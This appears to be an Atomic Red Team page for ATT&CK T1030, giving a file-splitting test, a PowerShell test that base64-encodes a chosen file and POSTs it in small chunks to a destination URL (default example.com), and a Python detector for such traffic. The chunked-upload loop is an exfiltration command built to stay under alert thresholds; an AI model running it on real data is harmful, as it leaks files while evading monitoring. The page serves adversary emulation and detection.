T1030 - Data Transfer Size Limits

Description from ATT&CK

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

Atomic Tests


Atomic Test #1 - Data Transfer Size Limits

Take a file/directory, split it into 5Mb chunks

Supported Platforms: macOS, Linux

auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name | path | T1030_urandom |
| folder_path | Path where the test creates artifacts | path | /tmp/T1030 |

Attack Commands: Run with sh!

cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}

Cleanup Commands:

if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;

Dependencies: Run with sh!

Description: The file must exist for the test to run.
Check Prereq Commands:
if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
Get Prereq Commands:
if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1


Atomic Test #2 - Network-Based Data Transfer in Small Chunks

Simulate transferring data over a network in small chunks to evade detection.

Supported Platforms: Windows

auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| source_file_path | Path to the source file to transfer. | path | [User specified] |
| destination_url | URL of the destination server. | url | http://example.com |
| chunk_size | Size of each data chunk (in KB). | integer | 1024 |

Attack Commands: Run with powershell!

$file = [System.IO.File]::OpenRead("#{source_file_path}")
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize
 
while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()
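
A detection-side example for the traffic pattern Test #2 generates, added here and not part of the Atomic Red Team test: it flags source/destination pairs whose individual uploads each stay under a per-transfer alert threshold while their total within a time window does not, and whose uploads mostly share one size. The record layout, host names, thresholds and the function name `find_chunked_transfers` are assumptions; the sample records are constructed.

```python
from collections import Counter, defaultdict

# Constructed sample records: (epoch_seconds, src_host, dst_host, request_body_bytes).
# 1398104 is the base64 length of one 1024 KB chunk, the body size Test #2 would POST
# with its default chunk_size.
SAMPLE_FLOWS = (
    [(1000 + i * 2, "ws-17", "example.com", 1_398_104) for i in range(24)]
    + [(1050, "ws-17", "example.com", 611_000)]          # shorter final chunk
    + [(1003, "ws-22", "intranet.example", 48_213),      # ordinary, irregular traffic
       (1400, "ws-22", "intranet.example", 2_910_554),
       (2100, "ws-22", "intranet.example", 730)]
)


def find_chunked_transfers(flows, per_transfer_alert=5_000_000,
                           aggregate_alert=20_000_000, window=600,
                           min_repeats=5, uniform_ratio=0.8):
    """Return one finding per (src, dst, window) where every transfer is below
    per_transfer_alert, the windowed total reaches aggregate_alert, and at least
    uniform_ratio of the transfers share a single size (fixed-size chunking).

    Windows are fixed (tumbling) buckets of `window` seconds; a burst that
    straddles a bucket boundary is split, so production logic would use a
    sliding window instead.
    """
    buckets = defaultdict(list)
    for ts, src, dst, size in flows:
        buckets[(src, dst, ts // window)].append(size)

    findings = []
    for (src, dst, win), sizes in sorted(buckets.items()):
        chunk_size, repeats = Counter(sizes).most_common(1)[0]
        total = sum(sizes)
        under_radar = max(sizes) < per_transfer_alert   # no single transfer alerts
        uniform = repeats >= min_repeats and repeats / len(sizes) >= uniform_ratio
        if under_radar and uniform and total >= aggregate_alert:
            findings.append({"src": src, "dst": dst, "window_start": win * window,
                             "transfers": len(sizes), "chunk_size": chunk_size,
                             "total_bytes": total})
    return findings


if __name__ == "__main__":
    for finding in find_chunked_transfers(SAMPLE_FLOWS):
        print(finding)
```

Feed it proxy or flow records reduced to the same four fields, and tune the thresholds to the size alerts already deployed in the environment.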